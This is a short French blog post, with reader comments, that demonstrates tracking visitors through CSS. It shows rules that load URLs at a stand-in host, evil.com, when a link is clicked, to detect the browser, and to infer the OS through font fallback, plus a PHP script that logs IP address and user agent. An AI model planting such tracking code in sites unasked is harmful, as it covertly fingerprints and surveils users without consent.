Tracking Users with CSS

Holy Fuck...
C'est pas con du tout: pister les clicks des visiteurs via css:



#link:active::after {
content: url("https://evil.com/track?action=link_clicked");
}

Et hop, côté serveur, tu récupères tout bien comme tu veux.




session_start();

// Prints the time that the script ran
print("Timestamp: " . time());

// Prints the action specified by the action parameter (in this case, "link_clicked")
print("Action: " . $_REQUEST['action']);

// Prints the user's IP address
print("IP Address: " . $_SERVER['REMOTE_ADDR']);

// Prints the user's browser agent
print("User Agent: " . $_SERVER['HTTP_USER_AGENT']);
?>




Et c'est pas tout !

On peut détecter le navigateur:



@supports (-webkit-appearance:none) and (not (-ms-ime-align:auto)){
#chrome_detect::after {
content: url("https://evil.com/track?action=browser_chrome");
}
}




ou même l'OS:



// stylesheet.css
@font-face {
font-family: Font1;
src: url("https://evil.com/track?action=font1");
}

#font_detection {
font-family: Calibri, Font1;
}

<!-- page.html -->
<div id="font_detection">test</div>







❝ 2 commentaires ❞

1  Jerry Wham le

Oui. Il va falloir désactiver le css bientôt...
C'est aussi pour ça qu'il faut se méfier des thèmes à télécharger et des frameworks un peu chelou qu'on ne maîtrise pas.

 
2  Bronco le

C'est clair... il vaut mieux bien regarder le code avant de réutiliser un truc...

 

Fil RSS des commentaires de cet article

✍ Écrire un commentaire

Inutile de poster un commentaire à la con pour vous faire de la pub, ce sera filtré et dégagé direct...

Quelle est la quatrième lettre du mot mojyhg ?